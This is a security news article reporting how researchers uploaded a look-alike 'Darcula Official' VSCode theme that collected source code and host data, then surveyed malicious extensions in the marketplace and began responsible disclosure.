Attack Surface Management
,
Security Operations
Researchers Infiltrate Major Organizations Using Fake Extension
Cybersecurity researchers say an experiment in developing a fake, malicious extension for the world’s most popular integrated development environment succeeded beyond their wildest expectations.
See Also: Attack Surface Management Automation: Missteps and Solutions
Researchers Amit Assaraf, Itay Kruk, and Idan Dardikman uploaded an extension to Microsoft source code editing platform Visual Studio Code masquerading as “Dracula Official,” a color theme for that records nearly 7.2 million installs.
Assaraf and company called their theme “Darcula Official.”
Extensions are an important feature of VSCode – the idea is for developers to turn their instance of VSCode into a customizable editor with the features they want beyond the bare-bones functionality provided out of the box. In a blog post, Assaraf said he counts approximately 60,000 VSCode extensions from about 45,000 different publishers. Only about 1,800 of them are verified – but it turns out that becoming a verified publisher is little more difficult than verifying control over a domain, which the researchers did for darculatheme.com.
The extension gained popularity rapidly, with over 100 installs in a day, including – Assaraf wrote without naming the company – on a Windows machine within a publicly listed company worth $483 billion. The fake extension exfiltrated source code and also sent beacons with detailed host machine information, including hostname, domain, platform and number of installed extensions.
Their success comes down to poor design choices by Microsoft, Assaraf wrote in a follow up blog post.
“Microsoft has not implemented any sorts of permission management or visibility for installed extensions, meaning that any extension can perform any API action,” he said. “For example, a theme extension that should only change the colors of my IDE, may execute code and read or write files without any visibility or explicit authorization from the user.”
Microsoft also doesn’t limit what VSCode extensions can do on the host machine. “They can spawn child processes, they can execute system calls, they can import any NodeJS package they’d like, making them highly risky.” The researcher alkso fauled Microsoft for permitting silent, automatic updates of extensions – opening a path for hackers to propagate a legitimate extension and later turn it malicious.
The researchers investigated whether malevolent actors have previously exploited similar tactics and discovered 1,283 extensions containing malicious code. The extensions amassed 229 million installs. They also found 8,161 extensions communicating with hardcoded IP addresses, 1,452 running unknown executable binaries, and 2,304 using another publisher’s GitHub repo as their official repository.
In response to their findings, the researchers started a process of responsible disclosure with affected companies. They are also developing “ExtensionTotal,” a tool aimed at analyzing and assessing the risk of VSCode extensions.